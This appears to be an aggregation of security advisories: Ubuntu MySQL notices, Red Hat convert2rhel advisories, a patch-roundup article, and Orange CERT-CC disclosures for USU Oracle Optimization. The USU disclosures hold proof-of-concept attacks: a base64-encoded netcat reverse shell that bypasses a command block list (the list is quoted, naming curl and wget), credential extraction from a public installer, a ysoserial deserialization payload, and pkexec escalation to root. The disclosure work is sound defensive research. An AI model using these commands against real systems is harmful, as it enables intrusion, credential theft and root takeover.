Ubuntu Security Notice 5400-2 - USN-5400-1 fixed several vulnerabilities in MySQL. This update provides the corresponding update for Ubuntu 16.04 ESM. Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated in Ubuntu 16.04 ESM to MySQL 5.7.38.

    =========================================================================Ubuntu Security Notice USN-5400-2May 04, 2022mysql-5.7 vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in MySQL.Software Description:- mysql-5.7: MySQL databaseDetails:USN-5400-1 fixed several vulnerabilities in MySQL. This update providesthe corresponding update for Ubuntu 16.04 ESM.Original advisory details: Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated in Ubuntu 16.04 ESM to MySQL 5.7.38. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes. Please see the following for more information: https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-38.html https://www.oracle.com/security-alerts/cpuapr2022.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:  mysql-server-5.7                5.7.38-0ubuntu0.16.04.1+esm1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:  https://ubuntu.com/security/notices/USN-5400-2  https://ubuntu.com/security/notices/USN-5400-1  CVE-2022-21417, CVE-2022-21427, CVE-2022-21444, CVE-2022-21451,  CVE-2022-21454, CVE-2022-21460

Ubuntu Security Notice USN-5400-2

Ubuntu Security Notice 5400-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.29 in Ubuntu 20.04 LTS, Ubuntu 21.10, and Ubuntu 22.04 LTS. Ubuntu 18.04 LTS has been updated to MySQL 5.7.38. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-5400-1May 03, 2022mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 21.10- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.29 in Ubuntu 20.04 LTS, Ubuntu 21.10, andUbuntu 22.04 LTS. Ubuntu 18.04 LTS has been updated to MySQL 5.7.38.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-38.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-29.htmlhttps://www.oracle.com/security-alerts/cpuapr2022.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  mysql-server-8.0                8.0.29-0ubuntu0.22.04.1Ubuntu 21.10:  mysql-server-8.0                8.0.29-0ubuntu0.21.10.1Ubuntu 20.04 LTS:  mysql-server-8.0                8.0.29-0ubuntu0.20.04.2Ubuntu 18.04 LTS:  mysql-server-5.7                5.7.38-0ubuntu0.18.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:  https://ubuntu.com/security/notices/USN-5400-1  CVE-2022-21412, CVE-2022-21413, CVE-2022-21414, CVE-2022-21415,  CVE-2022-21417, CVE-2022-21418, CVE-2022-21423, CVE-2022-21425,  CVE-2022-21427, CVE-2022-21435, CVE-2022-21436, CVE-2022-21437,  CVE-2022-21438, CVE-2022-21440, CVE-2022-21444, CVE-2022-21451,  CVE-2022-21452, CVE-2022-21454, CVE-2022-21457, CVE-2022-21459,  CVE-2022-21460, CVE-2022-21462, CVE-2022-21478Package Information:  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.29-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.29-0ubuntu0.21.10.1  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.29-0ubuntu0.20.04.2  https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.38-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5400-1

USU Oracle Optimization before 5.17.5 allows authenticated DataCollection users to achieve agent root access because some common OS commands are blocked but (for example) an OS command for base64 decoding is not blocked. NOTE: this is not an Oracle Corporation product.

A bypass allows to execute any commands on agents using "Diagnostic" feature.

A user with "DataCollection" profile can launch from the server any shell command as root on agents.

"Diagnostic" feature allows to run shell commands. These commands are run on agents as root.  
The following block list is implemented in order to prevent arbitrary execution.

    "rm", "kill", "mkfs", "reboot", "vi", "vim", "mv", "poweroff", "shred", "mount", "umount", "shutdown", "dd", "init", "touch", "chmod", "curl", "history", "id", "last", "nano", "password", "sshd", "useradd", "userdel", "wget" 
    

This block list can be trivially bypassed.

This proof of concept demonstrate the possibility to establish reverse shell on an agent.

    $ echo "nc -e /bin/bash <your ip> 4444" | base64
    bmMgLWUgL2Jpbi9i<REDACTED>
    

Then launch a TCP listner on you machine.

    $ nc -vnl 4444
    Listening on 0.0.0.0 4444
    

On the web interface select following tab:  
"Data collection" -> "Collectors management" -> "Batch operations"

Select an agent and create an new batch operation. Select "Diagnostic".

You should receive an incoming connection on the TCP listener.

    Connection Received on <REDACTED>
    id
    uid=0(root) gid=0(root) groups=0(root) 
    

We recommend to use an allow list approach.

CVE-2022-29937: Build software better, together

USU Oracle Optimization before 5.17.5 allows attackers to discover the quantum credentials via an agent-installer download. NOTE: this is not an Oracle Corporation product.

**Package**

Oracle optimization ( )

**Affected versions**

20210817

**Overview**

Artifactory: Directory listing & No access control

**Impact**

*   Send malicious payload to compromise main server
*   Inject fake/erroneous data to alter collect results

**Details**

Directory listing is enabled and no access control is implemented on https://poc-oracle.sam.usu.com/artifactory/  
Anyone can download agent installer and retrieve embedded secrets (quantum user login/password) to authenticate to main server (with privileges to push collected data).

**Proof of Concept**

This proof of concept demonstrate the possibility to retreive quantum credentials without any permission on platform.

Download agent installer:

    $ wget https://poc-oracle.sam.usu.com/artifactory/smartcollect-release/fr/usu/smartcollect/smartcollector-installer/5.16.2/smartcollector-installer-5.16.2-linux-x64.tgz
    

Exctract smartcollector.properties:

    $ tar xzf smartcollector-installer-5.16.2-linux-x64.tgz smartcollector-installer/smartcollector.properties
    

Extract credentials from agent configuration:

    grep -B 1 "^SMARTCOLLECT_" smartcollector-installer/smartcollector.properties
    

**Solution****Security patch**

Upgrade to version 5.17.5

**Workaround**

We recommand to:

*   Implement access control based on authentication & authorization.
*   Disable directory listing

**References**

ITDEVLC4O-2965 - Prevent artifactory directory listing

**Credits**

Orange CERT-CC  
Frederic BONE at Orange group

**Timeline**

**Date reported:** September 29, 2021  
**Date fixed:** November 24, 2021

CVE-2022-29935: Build software better, together

USU Oracle Optimization before 5.17 allows authenticated quantum users to achieve remote code execution because of /v2/quantum/save-data-upload-big-file Java deserialization. NOTE: this is not an Oracle Corporation product.

**Overview**

Quantum agent does require authentication to be downloaded.  
Quantum userscredentials can be retreived in plaintext on agent configuration file.

**Impact**

A user with "Quantum" profile can trigger an unsecure deserialization on server APIs leading to RCE shell as "smartcollector" user.  
"smartcollector" user can trivially escalate to root thanks to pkexec missconfiguration (please see attached bug).

**Details**

"Quantum" profiles can request /v2/quantum/save-data-upload-big-file API.

This API is waiting for a file that is deserialized with SerializationUtil class:

Pseudo-code:

     public class SerializationUtil
     {
       public static Object deserialize(String fileName) throws IOException, ClassNotFoundException {
         FileInputStream fis = new FileInputStream(fileName);
         BufferedInputStream bis = new BufferedInputStream(fis);
         ObjectInputStream ois = new ObjectInputStream(bis);
         Object obj = ois.readObject();
         ois.close();
         return obj;
       }
       ...
    

Unsecure Java deserialization is a common bug that is referenced in the TOP 10 Owasp:

(OWASP deserialization cheatsheets)\[https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html\]

By chainning Java gadgets it is possible to trigger execution on the server. The following blog post explain the basic concepts of gadgets:

(snyk.io java gadget chainning)\[https://snyk.io/blog/serialization-and-deserialization-in-java/\]

Gadget chained have been referenced in various tools allowing to quickly build payloads relying on dependencies. In our case we used ysoserial.

(https://github.com/frohoff/ysoserial)\[https://github.com/frohoff/ysoserial\]

By replacing the hibernate dependancy version in pom.xml with the one used on the server, we succeed to create valid payloads:

    		<dependency>
    		  <groupId>org.hibernate</groupId>
    		  <artifactId>hibernate-core</artifactId>
    -		  <version>5.0.7-final</verion>
    +		  <version>5.2.10-final</verion>
    		</dependency>
    

Once ysoserial is built (mvn clean package -DskipTests) it is possible to generate payloads:

    java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 '<your cmd>'
    

**Proof of Concept**

You can find here a python script that demonstrates the ability to establish a reverse shell (here to 127.0.0.1 4444).  
The Hibernate1 gadget chain payload has been encoded into base64.

Note: the encoded payload establish a reverse shell locally. For this proof of concept the script also should be executed locally.

The script require pwntools python framework.

*   install pwntools (pip install pwntools)
*   Copy python script from Appendix on the server.
*   Replace quantum credentials and URL with yours.
*   Then launch python script

It should result in remote code execution on server.

    $ python3 quantum_serialize_exploit.py
    [*] Try to authenticate to quantum
    [+] Authentcation succeed
    [*] Prepare reverse shell listener
    [+] Trying to bind to :: on port 4444: Done
    [+] Waiting for connections on :::4444: Got connection from ::ffff:127.0.0.1 on port 53112
    [*] Trigger unsecure deserialization
    [*] Switching to interactive mode
    $ id
    uid=1504(smartcollect) gid=1500(oinstall) groups=1500(oinstall),1504(smartcollect)
    $ pkexec id
    uid=0(root) gid=0(root) groups=0(root)
    

**Recommendation****Security Patch**

Upgrade to 5.17

**Workarounds**

We suggest to either use a more secure serialization or use a framework to validate user inputs before deserialization.

**References****Credits**

\[Orange CERT-CC\]\[ora\]  
Cyrille CHATRAS of \[Orange\]\[orange\] group  
\[ora\]: https://cert.orange.com/  
\[orange\]: https://www.orange.com/

**Timeline**

**Date reported:** September 29, 2021  
**Date fixed:** November 24, 2021

CVE-2022-29936: Build software better, together

USU Oracle Optimization before 5.17.5 lacks Polkit authentication, which allows smartcollector users to achieve root access via pkexec. NOTE: this is not an Oracle Corporation product.

**Package**

Oracle Optimization ( )

**Overview**

Unprivileged users such as "smartcollector" users can trivially escalate to root thanks to pkexec missconfiguration.

**Impact**

A compromised application server have full access to the system.

**Details**

Installation scripts for USU server enable polkit without authentication:  
On file sources/database/1database_root.sh:898:

    grep -q "polkit.Result.YES" /etc/polkit-1/rules.d/99-deny-all.rules >/dev/null 2>&1
    

On file sources/middleware/0middleware_root.sh:1746:

    echo "return polkit.Result.YES;" >> /etc/polkit-1/rules.d/99-deny-all.rules 
    

**Proof of Concept**

    $ id
    uid=1504(smartcollect) gid=1500(oinstall) groups=1500(oinstall),1504(smartcollect)
    $ pkexec id
    uid=0(root) gid=0(root) groups=0(root)
    

**Recommendation****Security Patch**

Upgrade to version 5.17.5

**Workarounds**

We suggest to disable polkit or enable authentication.

####References  
\[ITDEVLC4O-2967\] - Configure polkit safety

**Credits**

Orange CERT-CC  
Cyrille CHATRAS of Orange group

**Timeline**

**Date reported:** September 29, 2021  
**Date fixed:** November 24, 2021

CVE-2022-29934: Build software better, together

Plus: Microsoft patched some 100 flaws, while Oracle issued more than 500 security fixes.

To find the update, you’ll need to check your device settings. Devices that have received the Android April update so far include Google’s Pixel devices and some third-party Android phones, including the Samsung Galaxy A32 5G, A51, A52 5G, A53 5G, A71, S10 series, S20 series, Note20 series, Z Flip 5G, Z Flip3, Z Fold, Z Fold2, and the Z Fold3, as well as the OnePlus 9 and OnePlus 9 Pro.

Google Chrome Emergency Updates

As the world’s biggest browser with over 3 billion users, it’s no surprise attackers are targeting Google Chrome. Browser-based attacks are particularly worrying because they can potentially be chained together with other vulnerabilities and used to take over your device.

It has been a particularly busy month for the team behind Google’s Chrome browser, which has seen several security updates within weeks of each other. The latest, pushed out in mid-April, fixes two issues including a high-severity zero-day vulnerability, CVE-2022-1364, which is already being used by attackers.

The technical details aren’t currently available, but the timing of the fix—just a day after it was reported—indicates it’s pretty serious. If you use Chrome, your browser should now be on version 100.0.4896.127 to include the fix. You’ll need to restart Chrome after the update has installed to ensure it activates.

The Chrome issue also impacts other Chromium-based browsers, including Brave, Microsoft Edge, Opera, and Vivaldi, so if you use one of those, make sure you apply the patch.

But that’s not all. On April 27, Google announced another Chrome update, fixing 30 security vulnerabilities. None of these have been exploited yet, the company says, but seven are rated as being a high risk. The update takes the browser to version 101.0.4951.41.

Oracle’s April 2022 Critical Patch Update

In mid-April, Oracle released its quarterly Critical Patch Update, including a whopping 520 security fixes. Some of the issues fixed in the update are serious—300 of them can be exploited remotely without authentication, and 75 security issues are rated as critical severity. Some of the Oracle patches address CVE-2022-22965, aka Spring4Shell, a remote code execution (RCE) flaw in the spring framework.

Microsoft’s Busy April Patch Tuesday

Microsoft had a major Patch Tuesday in April, issuing fixes for over 100 vulnerabilities, including 10 critical RCE flaws. One of the most important, CVE-2022-24521, is already being exploited by attackers, according to the company.

Reported by the NSA and researchers at CrowdStrike, the issue in the Windows Common Log File system driver doesn’t require human interaction to be exploited and can be used to obtain administrative privileges on a logged-in system. Other notable fixes include CVE-2022-26904—a publicly known issue—and CVE-2022-26815, a severe DNS Server flaw.

Mozilla Thunderbird 91.8.0 Fix

On April 5, Mozilla released a patch to fix security issues in its Thunderbird email client as well as its Firefox browser. The details are scant, but Thunderbird 91.8 fixes four vulnerabilities rated as having a high impact, some of which could be exploited to run arbitrary code.

Firefox ESR 91.8 and Firefox 99 also fix multiple security issues.

WordPress Plugin Elementor Version 3.6.3 

The Elementor website builder plug-in for WordPress has received a big security fix in April for a critical-rated vulnerability that could allow attackers to perform remote code execution and effectively take over a website.

Found by researchers at Plugin Vulnerabilities, the flaw was introduced in the plug-in in version 3.6.0, released on March 22. “We would recommend not using this plugin until it has had a thorough security review and all issues are addressed,” the researchers said.

Although the attacker must be authenticated to exploit the issue, it’s still pretty serious because anyone logged into an affected website can exploit it. The update for Elementor’s 5 million users, version 3.6.3, should be applied as soon as possible.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   This startup wants to watch your brain
*   The artful, subdued translations of modern pop
*   Netflix doesn't need a password-sharing crackdown
*   How to revamp your workflow with block scheduling
*   The end of astronauts—and the rise of robots
*   👁️ Explore AI like never before with our new database
*   ✨ Optimize your home life with our Gear team’s best picks, from robot vacuums to affordable mattresses to smart speakers

You Need to Update iOS, Android, and Chrome Right Now

Red Hat Security Advisory 2022-1599-01 - The convert2rhel package provides the Convert2RHEL utility, which performs operating system conversion. During the conversion process, Convert2RHEL replaces all RPM packages from the original Linux distribution with their Red Hat Enterprise Linux versions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: convert2rhel security update  
Advisory ID:       RHSA-2022:1599-01  
Product:           Convert2RHEL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1599  
Issue date:        2022-04-27  
CVE Names:         CVE-2022-0852   
=====================================================================

1. Summary:

A security update for convert2rhel is now available for supported  
conversions of CentOS Linux 8 and Oracle Linux 8 to Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Convert2RHEL for RHEL-8 - noarch

3. Description:

The convert2rhel package provides the Convert2RHEL utility, which performs  
operating system conversion. During the conversion process, Convert2RHEL  
replaces all RPM packages from the original Linux distribution with their  
Red Hat Enteprise Linux versions.

Security fix:

* convert2rhel: Red Hat account password passed via command line by code  
(CVE-2022-0852)

Enhancement:

* Enable the conversion of untested 8.6 to 8.10 on release day

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2060129 - CVE-2022-0852 convert2rhel: Red Hat account password passed via command line by code

6. Package List:

Convert2RHEL for RHEL-8:

Source:  
convert2rhel-0.25-4.el8.src.rpm

noarch:  
convert2rhel-0.25-4.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0852  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/converting_from_an_rpm-based_linux_distribution_to_rhel/index  
https://access.redhat.com/support/policy/convert2rhel-support

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYmkYgNzjgjWX9erEAQinhg//fR2MK/94iruGXZAki0iXRBbXuhCTkqbN  
X9wLjr2QegKAzZrMyn9tXxYwLNAMUd7E2OAcJPT2cQz3yJWqBpdeGEGEfavUQR4q  
jrE74JDSmDfJkLIYi5N391DNvmB5Efhkk/j5pc1KcCTcr9x5QpbtMRSbkZsbDsVb  
90IstOMd0ngoW2Qun7uRtGRlRobINSn/ntCOestkHD/MCRddkwHkVXgQOwAdW0MZ  
1YqFEdwchimEWWiMKUrTQ8x+ky6VPINPZEK9fnQVt+Iha0GR1fynI0qNFJAObuLd  
6KMFPGnsR8h1lCAmn4PzfIOosBy+FYSp0GUBQDlm9Yfjznbfztdeh9uz1n8HE5rk  
4jSiDG0BUmdy83SjYLzw7jlQgPJkQMAwrulcG3w/M6Z/pdqN+gB3HYmGdLMTHgc7  
RdwoXnL3DuJnn/Zvji4EixnyvDCfqtSBmqns2UNdJxUxJZFRQCHgrjuyhfCqedmY  
PQcftSr9WNhu6qJrt92YG4Hen9Al3hZJ20bF1fx/ZU3E7UYoJdQG0WlSUmexAMH0  
x8kTPrb/9fOOyQv+BVqyVfJdrx+Vtr7NEs4kdslA4keVlpNVKMenNedB7AxMkLkx  
8pMB6b/DuYp+c3nMrlk1UMDR5hWnqhXV1kRPx60EsYctjLlQfHrqFp/2t5XszgWJ  
gHFgBew6ZHA=  
=pOkq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1599-01

Red Hat Security Advisory 2022-1617-01 - The convert2rhel package provides the Convert2RHEL utility, which performs operating system conversion. During the conversion process, Convert2RHEL replaces all RPM packages from the original Linux distribution with their Red Hat Enterprise Linux version.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: convert2rhel security update  
Advisory ID:       RHSA-2022:1617-01  
Product:           Convert2RHEL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1617  
Issue date:        2022-04-27  
CVE Names:         CVE-2022-0852   
=====================================================================

1. Summary:

A security update for convert2rhel is now available for supported  
conversions of CentOS Linux 7 and Oracle Linux 7 to Red Hat Enterprise  
Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Convert2RHEL for RHEL-7 - noarch

3. Description:

The convert2rhel package provides the Convert2RHEL utility, which performs  
operating system conversion. During the conversion process, Convert2RHEL  
replaces all RPM packages from the original Linux distribution with their  
Red Hat Enterprise Linux version.

Security fix:

* convert2rhel: Red Hat account password passed via command line by code  
(CVE-2022-0852)

Enhancement:

* Enable the conversion of untested 8.6 to 8.10 on release day

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2060129 - CVE-2022-0852 convert2rhel: Red Hat account password passed via command line by code

6. Package List:

Convert2RHEL for RHEL-7:

Source:  
convert2rhel-0.25-4.el7.src.rpm

noarch:  
convert2rhel-0.25-4.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0852  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/converting_from_an_rpm-based_linux_distribution_to_rhel/index  
https://access.redhat.com/support/policy/convert2rhel-support

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYmkYbdzjgjWX9erEAQgngQ/+IEXe9uN7PcKMlB0YnofHav8q+U+lb3GQ  
FEeI0mb9fT2Em1fg3262RmYam6BVDb9kspFIOXxcvS5yBfgPoC7qHkYij4mDJbEo  
eFj0HH0BxvHt52ZcG0mr56hF+yMUm70A8YLb1rKnkLwzpYzO5XrQwSTSF9ew0HIO  
00g8oSVCPJl7vVGcBBTuHlaFxsQhv6aCMngKEhixkC8tzsBKMMJ0jYRGHJe9t2aU  
TRPHkfLrc8SKlqJ98yhH5XdBVMjaXMDKGGF0SmLX868SuqCfh/3fvyIhHW59EPZg  
35SKFzgPJCfiSSp8MFkHZe1yN6l+Dhl3Jv8qNYLkFApur8nBLZi/pehEEHnscQuC  
WzzB5WSR7V3HqKoxKV9DWSEF2QmQ//sVl9mUZHegDzMZe9/5sJcShcsz3XCLjiBC  
sWaiPAZ8Jp4CIbHwUITjX6lKNs0K2lsGUEq/1Jyyf8AXYUFNNUs2yN4Stmg69AUF  
yAjQunHyVSDA4nbybWGGrvCVduHiIRqGTty7u3SvPVnBGEVC2XeAODxO6/AWl3Lg  
S0UpMUuZOdM0Rew5gpbkIOC59P0ZjxllsCtmdNMwjAwaYo9lndpmf8DFup4HRFe9  
5kSanZEvorBj8pGwdBwYvEr5P762iCEqrVAJZKHMk4Ig1xqj7GzyaOibVBU97o6c  
G2NXL8VkrTQ=  
=K2xq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1617-01

Red Hat Security Advisory 2022-1618-01 - The convert2rhel package provides the Convert2RHEL utility, which performs operating system conversion. During the conversion process, Convert2RHEL replaces all RPM packages from the original Linux distribution with their Red Hat Enterprise Linux version.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: convert2rhel security update  
Advisory ID:       RHSA-2022:1618-01  
Product:           Convert2RHEL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1618  
Issue date:        2022-04-27  
CVE Names:         CVE-2022-0852   
=====================================================================

1. Summary:

A security update for convert2rhel is now available for unsupported  
conversions of CentOS Linux 6 and Oracle Linux 6 to Red Hat Enterprise  
Linux 6.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Convert2RHEL for RHEL-6 - noarch

3. Description:

The convert2rhel package provides the Convert2RHEL utility, which performs  
operating system conversion. During the conversion process, Convert2RHEL  
replaces all RPM packages from the original Linux distribution with their  
Red Hat Enterprise Linux version.

Security fix:

* convert2rhel: Red Hat account password passed via command line by code  
(CVE-2022-0852)

Enhancement:

* Enable the conversion of untested 8.6 to 8.10 on release day

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2060129 - CVE-2022-0852 convert2rhel: Red Hat account password passed via command line by code

6. Package List:

Convert2RHEL for RHEL-6:

Source:  
convert2rhel-0.25-4.el6.src.rpm

noarch:  
convert2rhel-0.25-4.el6.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0852  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/articles/2360841  
https://access.redhat.com/support/policy/convert2rhel-support

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYmkYZNzjgjWX9erEAQhUCw/+JOfVj5t8dBwkbFFl13eYTKxaffs5S31O  
lIDX+qobhvZpAf10N+L4+C4kkbz3g3i2D5PKel8raQzbwlo4taiGHHEQ/EabOkjn  
pStKFIaXaS7ahJcLPOjE1jA0A3JDhFhBrh+UNmDfGeawDf1NtO9IugqrlbdGDPCh  
EAIQyB7aXgobDiBnULMrfIucQubX5lEv2Zk5Qa1wFsvrFmnc2cmh3lQ1KTzEm1TB  
0rUYdsOdgePxrLikS/qccXSUrBVbb2+0vt4rq6ZtXQjwRk/btfRAbvzGeIgMiOgx  
ii2sJPZ/Wfm6Uw+TXfWLxByCAD17SQij3lU1JVAN13AdaOUvaihbgzkjbOBX8KrI  
RsehNv23Nde6ixRCVC3smCnCQMkfwF4Va8PCx83PUz5ggJXNV7gElOMGH8P8BKCI  
GWLdQYZi1HrLvzPpuRyL5HbrIy5eEbeV9IhW3oAKcp/+rtkkjvA3GARrYJIYPZY5  
iNYihDMXJLuQIizidt78q+QplZcfA5hBF+zbKV0zhE40svvG69fRZUJ6l0kczHBu  
/gQsEKWtDo+/pS74uDKn5LV9VZ/CVI4pWAul2/mNldA8emen6sTk55QlW6/12KyL  
rsmdOBJlyJFamwEDz/2buhBGNGhss5tzVC0cQ9pKPMfHC7mGeuXATark6MvEnRCS  
ruplhcS704c=  
=kqai  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#oracle